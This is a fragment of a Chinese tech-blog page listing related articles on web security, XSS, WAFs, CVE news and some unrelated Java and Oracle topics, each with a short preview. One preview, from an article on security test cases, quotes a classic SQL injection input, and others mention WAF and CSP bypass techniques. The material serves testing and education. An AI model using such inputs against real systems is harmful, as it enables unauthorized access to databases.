                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(安全渗透—Hacker,xss,安全漏洞)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1835182528177205248.htm"
                           title="解决mysql漏洞 Oracle MySQL Server远程安全漏洞(CVE-2015-0411)" target="_blank">解决mysql漏洞 Oracle MySQL Server远程安全漏洞(CVE-2015-0411)</a>
                        <span class="text-muted">dieweidong5625</span>
<a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>有时候会检测到服务器有很多漏洞，而大部分漏洞都是由于服务的版本过低的原因，因为官网出现漏洞就会发布新版本来修复这个漏洞，所以一般情况下，我们只需要对相应的软件包进行升级到安全版本即可。通过查阅官网信息，OracleMySQLServer远程安全漏洞(CVE-2015-0411)，受影响系统：OracleMySQLServer/usr/databases.sql//先备份原有所有数据，防止数据丢失。</div>
                    </li>
                    <li><a href="/article/1834973616048009216.htm"
                           title="2020-04-09奋进的周四" target="_blank">2020-04-09奋进的周四</a>
                        <span class="text-muted">深山含笑空凝峡谷</span>

                        <div>从小就特别希望和别人不一样。瞪着一双很乖的眼睛目不转睛看老师，嘴上不说心里没放下过独特眼光和taste也是从幼年就形成了。要视角不同，创新，玩点别的花样和审美有些概念让自己想起来就会有点兴奋比如life-hacker/量化自我/digitalnormad/自由编舞师/读书社群leader/coach/创作者自我的形成/个体的觉醒/作为创作者，一定要有信心——我做的创作的，即使有人做过类似的了，我做</div>
                    </li>
                    <li><a href="/article/1834934669418786816.htm"
                           title="网络安全测评技术与标准" target="_blank">网络安全测评技术与标准</a>
                        <span class="text-muted">坚持可信</span>
<a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>网络安全测评是评估信息系统、网络和应用程序的安全性，以发现潜在的漏洞和威胁，并确保系统符合安全标准和政策的过程。以下是常见的网络安全测评类型：1.渗透测试（PenetrationTesting）描述：通过模拟真实的攻击，评估系统、网络和应用程序的安全性，识别和修复漏洞。目标：发现系统中的安全漏洞，评估其可能被利用的风险。方法：黑盒测试：测试人员没有系统内部信息，模拟外部攻击者。白盒测试：测试人员拥</div>
                    </li>
                    <li><a href="/article/1834925081566998528.htm"
                           title="Prism 教程" target="_blank">Prism 教程</a>
                        <span class="text-muted">yang_B621</span>
<a class="tag" taget="_blank" href="/search/Prism/1.htm">Prism</a><a class="tag" taget="_blank" href="/search/IOC/1.htm">IOC</a>
                        <div>http://t.csdnimg.cn/VXSSvhttps://blog.csdn.net/u010476739/article/details/119341731Prism-随笔分类-Hello——寻梦者！-博客园(cnblogs.com)C#IoC学习笔记-缥缈的尘埃-博客园(cnblogs.com)WPF_SchuylerEX的博客-CSDN博客</div>
                    </li>
                    <li><a href="/article/1834910587067396096.htm"
                           title="如何提高网络安全意识" target="_blank">如何提高网络安全意识</a>
                        <span class="text-muted">亿林网络安全事业部</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>提升网络安全意识的方法提升网络安全意识是个人和企业都需要重视的问题。以下是一些有效的方法：加强教育和培训：通过参加网络安全培训课程，学习识别网络攻击的常见迹象、安全密码的设置、不点击可疑链接等知识。建立网络安全政策：制定个人网络安全规则，如定期更改密码、不在公共网络上进行敏感操作等。定期更新系统：保持操作系统和软件程序的最新状态，及时修补安全漏洞。加强网络防护：使用防火墙、反病毒软件、入侵检测系统</div>
                    </li>
                    <li><a href="/article/1834909327081697280.htm"
                           title="Apache POI用法" target="_blank">Apache POI用法</a>
                        <span class="text-muted">JH3073</span>
<a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a>
                        <div>一、ApachePOI是什么ApachePOI是用Java编写的免费开源的跨平台的JavaAPI，ApachePOI提供API给Java程序对MicrosoftOffice格式档案读和写的功能，其中使用最多的就是使用POI操作Excel文件。二、POI结构HSSF－提供读写MicrosoftExcelXLS格式档案的功能XSSF－提供读写MicrosoftExcelOOXMLXLSX格式档案的功能</div>
                    </li>
                    <li><a href="/article/1834514784612085760.htm"
                           title="从零开始学习黑客技术，看这一篇就够了" target="_blank">从零开始学习黑客技术，看这一篇就够了</a>
                        <span class="text-muted">网络安全-旭师兄</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E6%BA%90/1.htm">开源</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a>
                        <div>黑客，对于很多人来说，是一个神秘的代名词，加之影视作品夸张的艺术表现，使得黑客这个本来只专注于技术的群体，散发出亦正亦邪的神秘色彩。黑客源自英文hacker一词，最初曾指热心于计算机技术、水平高超的电脑高手，尤其是程序设计人员，逐渐区分为白帽、灰帽、黑帽等。其中，白帽黑客被称为道德黑客。他们不会非法入侵用户网络，而是通过一系列测试检查公司安全系统的效率；黑帽黑客恰好与白帽黑客相反，他们往往为了个人</div>
                    </li>
                    <li><a href="/article/1834080024043548672.htm"
                           title="最新网络安全（黑客）——自学篇" target="_blank">最新网络安全（黑客）——自学篇</a>
                        <span class="text-muted">黑客小雨</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>*需要的小伙伴关注我第一阶段：基础操作入门，学习基础知识入门的第一步是学习一些当下主流的安全工具课程并配套基础原理的书籍，一般来说这个过程在1个月左右比较合适。在这个阶段，你已经对网络安全有了基本的了解。如果你学完了第一步，相信你已经在理论上明白了上面是sql注入，什么是xss攻击，对burp、msf、cs等安全工具也掌握了基础操作。这个时候最重要的就是开始打地基！所谓的“打地基”其实就是系统化的</div>
                    </li>
                    <li><a href="/article/1834065152429879296.htm"
                           title="SonicWall SSL VPN曝出高危漏洞，可能导致防火墙崩溃" target="_blank">SonicWall SSL VPN曝出高危漏洞，可能导致防火墙崩溃</a>
                        <span class="text-muted">FreeBuf-</span>
<a class="tag" taget="_blank" href="/search/%E8%B5%84%E8%AE%AF/1.htm">资讯</a><a class="tag" taget="_blank" href="/search/ssl/1.htm">ssl</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>近日，有黑客利用SonicWallSonicOS防火墙设备中的一个关键安全漏洞入侵受害者的网络。这个不当访问控制漏洞被追踪为CVE-2024-40766，影响到第5代、第6代和第7代防火墙。SonicWall于8月22日对其进行了修补，并警告称其只影响防火墙的管理访问界面。然而，SonicWall上周五（9月6日）透露，该安全漏洞还影响了防火墙的SSLVPN功能，且已被黑客用以网络攻击。该公司提醒</div>
                    </li>
                    <li><a href="/article/1833998858544312320.htm"
                           title="【漏洞复现】华三 H3C IMC 智能管理中心 /byod/index.xhtml RCE" target="_blank">【漏洞复现】华三 H3C IMC 智能管理中心 /byod/index.xhtml RCE</a>
                        <span class="text-muted">凝聚力安全团队</span>
<a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/1.htm">漏洞复现</a><a class="tag" taget="_blank" href="/search/xhtml/1.htm">xhtml</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/web%E6%B8%97%E9%80%8F/1.htm">web渗透</a><a class="tag" taget="_blank" href="/search/web/1.htm">web</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a>
                        <div>免责声明：本文内容旨在提供有关特定漏洞或安全漏洞的信息，以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步，并非出于任何恶意目的。阅读者应该明白，在利用本文提到的漏洞信息或进行相关测试时，可能会违反某些法律法规或服务协议。同时，未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所</div>
                    </li>
                    <li><a href="/article/1833830664764485632.htm"
                           title="微信小程序入门【三】：实现简单登录退出和个人信息页面" target="_blank">微信小程序入门【三】：实现简单登录退出和个人信息页面</a>
                        <span class="text-muted">山岫</span>
<a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a>
                        <div>效果图预览这个框很是惆怅，但是真机调试没出现过，这个bug下次再解决吧。这次说说登录。效果图：附上代码：home.wxml-->-->-->-->Hi游客{{userInfo.nickName}}-->退出登录@技术支持：江阔jk921home.wxss/*pages/scroll/scroll.wxss*/.top{width:100%;height:400rpx;background-colo</div>
                    </li>
                    <li><a href="/article/1833830286404710400.htm"
                           title="Web应用防火墙" target="_blank">Web应用防火墙</a>
                        <span class="text-muted">Smile灬凉城666</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/WAF/1.htm">WAF</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>一、定义与目的WAF是一种特殊类型的防火墙，专门设计用于监视、过滤和阻挡进出Web应用的HTTP流量。其主要目的是保护Web应用免受如XSS（跨站脚本）、SQL注入、会话劫持等网络攻击。二、工作原理WAF工作在应用层，即OSI模型的第七层。它通过对HTTP/HTTPS请求进行解析、协议检测、攻击识别和恶意行为阻断等步骤来保护Web应用。具体来说，WAF会解析进入Web应用的HTTP/HTTPS请求</div>
                    </li>
                    <li><a href="/article/1833821079899041792.htm"
                           title="如何识别和防范跨站脚本攻击（XSS）？" target="_blank">如何识别和防范跨站脚本攻击（XSS）？</a>
                        <span class="text-muted">盼盼盼</span>
<a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a>
                        <div>识别和防范跨站脚本攻击（XSS）需要一系列的措施，包括输入验证、输出编码、安全配置和用户教育。以下是一些关键步骤：识别XSS异常行为：观察网站行为是否异常，例如页面上突然出现未经预期的内容或功能。错误消息：检查错误消息中是否包含敏感信息，这可能是由于未经过滤的输入导致的。安全工具：使用浏览器插件或安全扫描工具来检测潜在的XSS漏洞。代码审计：定期进行代码审计，查找可能的安全漏洞，特别是在处理用户输</div>
                    </li>
                    <li><a href="/article/1833809859720605696.htm"
                           title="Oracle 12c 及以上版本补丁更新说明及下载方法" target="_blank">Oracle 12c 及以上版本补丁更新说明及下载方法</a>
                        <span class="text-muted">zd1320732</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/oracle12c/1.htm">oracle12c</a><a class="tag" taget="_blank" href="/search/%E8%A1%A5%E4%B8%81%E6%9B%B4%E6%96%B0/1.htm">补丁更新</a>
                        <div>参考下面的文章，会对补丁更新的流程有一定的了解。https://www.modb.pro/db/27255RU（ReleaseUpdates）是每一个季度的版本升级。包括：最新的BUG修复最新的安全漏洞补丁最新添加的功能以19c为例，对应的升级版本升级路线是（19.1.0.0.0->19.2.0.0.0->19.3.0.0.0…）到现在是19.8.0.0.0RUR是对RU的修订版本，包括：最新的B</div>
                    </li>
                    <li><a href="/article/1833784899098734592.htm"
                           title="从零开始学习黑客技术，看这一篇就够了" target="_blank">从零开始学习黑客技术，看这一篇就够了</a>
                        <span class="text-muted">网络安全-旭师兄</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E6%BA%90/1.htm">开源</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a>
                        <div>黑客，对于很多人来说，是一个神秘的代名词，加之影视作品夸张的艺术表现，使得黑客这个本来只专注于技术的群体，散发出亦正亦邪的神秘色彩。黑客源自英文hacker一词，最初曾指热心于计算机技术、水平高超的电脑高手，尤其是程序设计人员，逐渐区分为白帽、灰帽、黑帽等。其中，白帽黑客被称为道德黑客。他们不会非法入侵用户网络，而是通过一系列测试检查公司安全系统的效率；黑帽黑客恰好与白帽黑客相反，他们往往为了个人</div>
                    </li>
                    <li><a href="/article/1833713785567801344.htm"
                           title="【网络安全】空字节绕过：URL回调+XSS+SQL绕WAF" target="_blank">【网络安全】空字节绕过：URL回调+XSS+SQL绕WAF</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a>
                        <div>未经许可，不得转载。文章目录空字节URL回调XSSSQL空字节\0，也称为null字节，是一个值为零的特殊字符。在编程中，通常用来表示字符串的结束。攻击者可以利用null字节注入来绕过一些验证或过滤机制。以下三个漏洞，空字节功不可没。URL回调密码重置功能，发起请求后，邮箱会收到链接。请求包中存在callbackUrl参数：在参数中添加/test，发包后，邮箱中的链接为https://compan</div>
                    </li>
                    <li><a href="/article/1833514971900768256.htm"
                           title="Java Web安全与Spring Config对象实战" target="_blank">Java Web安全与Spring Config对象实战</a>
                        <span class="text-muted">福建低调</span>

                        <div>本文还有配套的精品资源，点击获取简介：本课程深入探讨JavaWeb开发中的安全实践，包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时，介绍SpringSecurity框架的应用，以及Config对象在Spring配置管理中的作用，包括依赖注入和外部化配置。课程还包括实战演练，通过设置安全环境和安全漏洞模拟，帮助开发者提升应用的安全性和故障排查能力。1.Web安全</div>
                    </li>
                    <li><a href="/article/1833466437298122752.htm"
                           title="Web安全之CSRF攻击详解与防护" target="_blank">Web安全之CSRF攻击详解与防护</a>
                        <span class="text-muted">J老熊</span>
<a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a><a class="tag" taget="_blank" href="/search/Web%E5%AE%89%E5%85%A8/1.htm">Web安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a>
                        <div>在互联网应用中，安全性问题是开发者必须时刻关注的核心内容之一。跨站请求伪造（Cross-SiteRequestForgery,CSRF），是一种常见的Web安全漏洞。通过CSRF攻击，黑客可以冒用受害者的身份，发送恶意请求，执行诸如转账、订单提交等操作，导致严重的安全后果。本文将详细讲解CSRF攻击的原理及其防御方法，结合电商交易系统的场景给出错误和正确的示范代码，并分析常见的安全问题与解决方案，</div>
                    </li>
                    <li><a href="/article/1833401364294758400.htm"
                           title="云WAF防御简介之0day攻击" target="_blank">云WAF防御简介之0day攻击</a>
                        <span class="text-muted">亿林科技网络安全</span>
<a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a>
                        <div>0day攻击简介0day攻击，也称为零日攻击，是指利用软件或系统中未被公开或未被修复的安全漏洞进行的攻击。这种攻击通常由黑客在发现漏洞后立即利用，而软件开发商可能还没有来得及发布相应的补丁来修复这些漏洞。0day攻击的特点0day攻击的特点包括其隐蔽性和危害性。由于漏洞尚未被发现或修补，攻击者可以轻易地利用这些漏洞获取敏感信息、破坏系统、篡改数据等，给目标系统带来严重的损失。防范0day攻击的建议</div>
                    </li>
                    <li><a href="/article/1833395689711824896.htm"
                           title="【网络安全】URL解析器混淆绕过CSP实现XSS" target="_blank">【网络安全】URL解析器混淆绕过CSP实现XSS</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a>
                        <div>未经许可，不得转载。文章目录前言正文前言许多流行的静态网站生成器都存在图像CDN功能，它们通过优化网站中的图像来加快页面加载速度。例如：1、OptimizingImages|Next.js利用内置的next/image组件优化图像（nextjs.org）2、NuxtImage:Nuxt应用的图像优化即插即用的图像优化功能，使用内置优化器对图像进行调整（image.nuxt.com）这些工具的目标都</div>
                    </li>
                    <li><a href="/article/1833388662021255168.htm"
                           title="调查了 12,000 名女性开发者发现，女性比男性更懂 Java！" target="_blank">调查了 12,000 名女性开发者发现，女性比男性更懂 Java！</a>
                        <span class="text-muted">Java架构学习者</span>

                        <div>华为的中国芯将何庭波这位神秘低调的程序媛推入公众视野。在华为地位堪比任正非的她在谈及“工程师”这一身份时表示，“我觉得工程师本身就是一个很不了的职业，这也是我一生的荣耀和自豪”。理工科行业的性别鄙视链由来已久，“女子本弱”论和对于有色人种的偏见一样扎根于各文化背景下。而放眼当下，年轻一代女性已经为进入科技行业做好了准备。“精英统治下，技能即一切”——程序媛arecoming！近日，HackerRa</div>
                    </li>
                    <li><a href="/article/1833313892722372608.htm"
                           title="XSS和sql注入部分场景测试用例样例" target="_blank">XSS和sql注入部分场景测试用例样例</a>
                        <span class="text-muted">谷隐凡二</span>
<a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95/1.htm">测试</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E7%94%A8%E4%BE%8B/1.htm">测试用例</a>
                        <div>目录1.SQL注入测试用例设计基本SQL注入复杂SQL注入盲注测试2.XSS攻击测试用例设计基本XSS攻击复杂XSS攻击DOM-basedXSS1.SQL注入测试用例设计SQL注入攻击通常通过在输入字段中插入恶意SQL代码，试图操纵数据库查询。设计这些测试用例时，需要涵盖各种常见的SQL注入技术。基本SQL注入用例1:使用单引号:输入:'OR'1'='1预期结果:应拒绝输入并返回错误消息，不应允许</div>
                    </li>
                    <li><a href="/article/1833247452673699840.htm"
                           title="如何限制用户仅通过HTTPS方式访问OSS？" target="_blank">如何限制用户仅通过HTTPS方式访问OSS？</a>
                        <span class="text-muted">阿里云技术</span>
<a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E4%B8%8E%E9%A3%8E%E6%8E%A7/1.htm">安全与风控</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/API/1.htm">API</a>
                        <div>一、当前存在的问题当前OSS支持用户使用HTTPS/HTTP协议访问Bucket。但由于HTTP存在安全漏洞。大型企业客户都要求使用HTTPS方式访问OSS，并且拒绝HTTP访问请求。目前OSS可以通过RAMpolicy方式实现：限制某个用户、角色拒绝通过HTTP协议访问指定的Bucket和对象。但是RAMPolicy是一种基于用户的授权方式，无法针对资源进行授权。也就是说无法针对Bucket或者</div>
                    </li>
                    <li><a href="/article/1833043550770655232.htm"
                           title="weblogic-SSRF漏洞复现（SSRF原理、利用与防御）" target="_blank">weblogic-SSRF漏洞复现（SSRF原理、利用与防御）</a>
                        <span class="text-muted">不想当脚本小子的脚本小子</span>
<a class="tag" taget="_blank" href="/search/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/1.htm">中间件漏洞复现</a><a class="tag" taget="_blank" href="/search/SSRF/1.htm">SSRF</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>一、SSRF概念服务端请求伪造(Server-SideRequestForgery),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片、文档等等。首先，我们要对目标网站的架构了解</div>
                    </li>
                    <li><a href="/article/1832993526179262464.htm"
                           title="Windows Hello 可绕过漏洞进行身份认证" target="_blank">Windows Hello 可绕过漏洞进行身份认证</a>
                        <span class="text-muted">H_00c8</span>

                        <div>Windows安全漏洞将允许攻击者欺骗用于系统生物特征面部识别方面的USB摄像头。微软Windows10无密码身份验证系统中的一个漏洞已被发现，攻击者可以利用该漏洞欺骗人脸图像以欺骗面部识别系统并控制设备。【网安资料】WindowsHello是Windows10提供的一个新的安全功能，该功能通过生物识别技术为小伙伴们带来指纹、人脸和虹膜等多种身份验证方式，具有极高的安全性。只有具备特定的硬件设备才</div>
                    </li>
                    <li><a href="/article/1832853952610267136.htm"
                           title="【网络安全】如何预防xss" target="_blank">【网络安全】如何预防xss</a>
                        <span class="text-muted">不会代码的小徐</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>XSS(Cross-SiteScripting，跨站脚本攻击)是一种代码注入攻击。攻击者通过在目标网站注入恶意脚本，使其在用户浏览器中执行，从而窃取用户敏感信息如Cookie和SessionID。CSS在前端已经被用了，为了避免歧义用了XSS作为缩写。XSS的本质是恶意代码与网站正常代码混在一起，浏览器无法分辨它们的可信度，最终导致恶意代码被执行。XSS的危害浏览器无法区分恶意代码和正常代码，它们</div>
                    </li>
                    <li><a href="/article/1832768596707733504.htm"
                           title="ASP.NET Core 入门教学十六 防止常见的Web攻击" target="_blank">ASP.NET Core 入门教学十六 防止常见的Web攻击</a>
                        <span class="text-muted">充值内卷</span>
<a class="tag" taget="_blank" href="/search/asp.net/1.htm">asp.net</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a>
                        <div>在ASP.NETCore中，防止常见的Web攻击是非常重要的，以确保应用程序的安全性。以下是一些常见的Web攻击类型及其防范措施：1.跨站脚本攻击（XSS）跨站脚本攻击（XSS）是一种通过在网页中注入恶意脚本来攻击用户的浏览器的技术。为了防止XSS攻击，可以采取以下措施：输入验证：对用户输入进行严格的验证和清理。输出编码：在将用户输入的数据插入到HTML页面中时，进行适当的编码。ASP.NETCo</div>
                    </li>
                    <li><a href="/article/1832625387834798080.htm"
                           title="python安全渗透笔记" target="_blank">python安全渗透笔记</a>
                        <span class="text-muted">红云谈安全</span>
<a class="tag" taget="_blank" href="/search/python%E7%BC%96%E7%A8%8B%E5%AD%A6%E4%B9%A0/1.htm">python编程学习</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>Python学习python常见错误UnicodeDecodeError:‘gbk’codeccan’tdecodebyte0x8cinposition22:illegalmultibytesequence//打开的文件未编码encoding='UTF-8'expectedanindentedblock未缩进，ifforcontinue又进入一次新的循环%将其他变量置入字符串特定位置以生成新字符串</div>
                    </li>
                    <li><a href="/article/1832592857161101312.htm"
                           title="HtmlSanitizer: 一个保护你的网站免受XSS攻击的.Net开源项目" target="_blank">HtmlSanitizer: 一个保护你的网站免受XSS攻击的.Net开源项目</a>
                        <span class="text-muted">编程乐趣</span>
<a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>Html跨站脚本攻击（XSS）是非常常见的，比如博客评论、论坛帖子、社交媒体发布动态等一些用户提交文本的地方，都有可能遭受恶意提交Html代码。为了确保用户提交内容的安全，我们就需要对用户提交内容进行过滤。01项目简介HtmlSanitizer是一个强大的库，它能够审查和清理HTML内容，移除或转义那些可能被用于XSS攻击的标签和属性。这个工具的核心功能是提供一个安全的方式来处理用户提交的HTML</div>
                    </li>
                    <li><a href="/article/1832422786732224512.htm"
                           title="Vue + ElementUI 实现全国各个省份相对应城市的联动选择_vue+elementui 省市区联动" target="_blank">Vue + ElementUI 实现全国各个省份相对应城市的联动选择_vue+elementui 省市区联动</a>
                        <span class="text-muted">2401_84617681</span>
<a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a>
                        <div>打开全栈工匠技能包-1小时轻松掌握SSR两小时精通jq+bs插件开发生产环境下如歌部署Node.js开源分享：【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】网易内部VUE自定义插件库NPM集成谁说前端不用懂安全，XSS跨站脚本的危害webpack的loader到底是什么样的？两小时带你写一个自己loader:rules="rules"label-width="150px">定</div>
                    </li>
                                <li><a href="/article/45.htm"
                                       title="安装数据库首次应用" target="_blank">安装数据库首次应用</a>
                                    <span class="text-muted">Array_06</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                                    <div>可是为什么再一次失败之后就变成直接跳过那个要求 
enter full pathname of java.exe的界面 
 
 
这个java.exe是你的Oracle 11g安装目录中例如：【F:\app\chen\product\11.2.0\dbhome_1\jdk\jre\bin】下的java.exe 。不是你的电脑安装的java jdk下的java.exe！ 
注意第一次，使用SQL D</div>
                                </li>
                                <li><a href="/article/172.htm"
                                       title="Weblogic Server Console密码修改和遗忘解决方法" target="_blank">Weblogic Server Console密码修改和遗忘解决方法</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/Welogic/1.htm">Welogic</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在工作中一同事将Weblogic的console的密码忘记了，通过网上查询资料解决，实践整理了一下。 
一.修改Console密码 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 打开weblogic控制台，安全领域&nbsp;--&gt; myrealm --&gt;&n</div>
                                </li>
                                <li><a href="/article/299.htm"
                                       title="IllegalStateException: Cannot forward a response that is already committed" target="_blank">IllegalStateException: Cannot forward a response that is already committed</a>
                                    <span class="text-muted">Cwind</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Servlets/1.htm">Servlets</a>
                                    <div>对于初学者来说，一个常见的误解是：当调用 forward() 或者 sendRedirect() 时控制流将会自动跳出原函数。标题所示错误通常是基于此误解而引起的。   示例代码：   
protected void doPost() {
    if (someCondition) {
        sendRedirect();
    }
    forward(); // Thi</div>
                                </li>
                                <li><a href="/article/426.htm"
                                       title="基于流的装饰设计模式" target="_blank">基于流的装饰设计模式</a>
                                    <span class="text-muted">木zi_鸣</span>
